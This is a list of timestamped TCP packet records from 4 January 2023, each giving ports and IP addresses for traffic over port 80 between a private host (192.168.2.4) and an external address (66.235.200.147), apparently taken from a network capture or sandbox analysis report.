Jan 4, 2023 16:47:39.029011011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029036999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029042006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029042006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029042006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029042006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029108047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029129028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029128075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029129028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029149055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029158115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029169083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029170036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029181004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029195070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029213905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029217005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029236078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029241085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029257059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029259920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029278994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029301882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029305935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029325008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029334068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029350042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029362917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029380083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029388905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029417038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029443026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029464006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029464960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029484034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029495955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029818058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029839993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029860020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029880047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029901028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029922962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029932976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029933929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029933929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029933929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029942989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029956102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.029966116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.029973984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030051947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030051947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030071020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030092955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030116081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030134916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030138016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030152082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030155897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030177116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030180931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030196905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030216932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030220985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030220985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030239105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030240059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030240059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030260086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030271053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030280113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030293941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030302048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030306101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030322075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030337095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030343056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030352116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030380964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030396938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030751944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030774117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030792952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030812979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030822039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030833960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030854940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030864000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030864000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030877113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030884981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030884981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030898094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030920982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030935049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030935049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030950069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030977011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.030982018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.030982018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031004906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031024933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031029940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031029940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031047106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031061888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031068087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031090021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031099081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031099081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031110048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031130075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031133890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031157017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031172037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031172037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031184912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031200886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031203985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031213999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031238079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031241894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031265974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031294107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031697035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031718969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031738997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031759977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031766891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031780958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031781912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031794071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031802893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031845093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031846046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031862020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031889915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031907082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031917095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031919956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031940937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031960964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.031979084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031979084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.031980991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032001972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032021999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032027960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032027960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032042027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032049894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032049894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032063007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032082081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032083035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032099962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032099962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032109022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032138109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032138109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032165051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032166004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032187939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032190084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032208920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032238007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032238960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032254934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032668114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032690048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032710075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032728910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032746077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032751083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032768011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032824039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032865047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032907009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032924891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032939911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032946110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032957077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032974005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032993078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.032996893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.032996893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.033015013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.033030987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.033035040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.033061028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.033072948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.033088923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.033097029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.033108950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.033118010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.033140898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.033159018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.033159018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.033196926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047321081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047358036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047378063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047405958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047425985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047447920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047472000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047497988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047524929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047550917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047552109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047580957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047595978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047607899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047629118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047632933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047658920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047663927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047688961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047696114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047718048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047729969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047745943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047755957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047771931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047775030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047797918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047806978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047820091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047820091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047847986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047868967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047883987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047883987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047883987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047895908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047916889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047919035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047945023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047946930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047964096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.047976017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.047986031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048007011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048037052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048043966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048060894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048070908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048082113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048084021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048104048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048124075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048130035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048136950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048147917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048160076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048171997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048187971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048204899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048214912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048237085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048238039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048257113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048271894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048279047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048300028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048300982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048314095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048321009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048337936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048342943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048355103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048365116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048377991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048384905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048401117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048409939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048427105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048448086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048468113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048635006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048657894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048680067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048691988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048707008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048718929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048736095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048753023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048763990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048765898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048785925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048805952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048811913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048814058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048826933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048827887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048850060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048870087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048871040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048886061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048886061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048892021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048913002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048922062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048933983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048948050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048954964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048975945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.048978090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.048996925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049007893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049017906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049038887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049040079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049060106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049067020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049082994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049098969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049104929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049109936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049138069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049164057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049742937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049773932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049810886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049839020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049860001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049860954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049882889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049887896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049905062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049922943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049925089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049947023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049952030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049968004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.049973011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.049989939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050009012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050009966 CET	80	49696	66.235.200.147	192.168.2.4
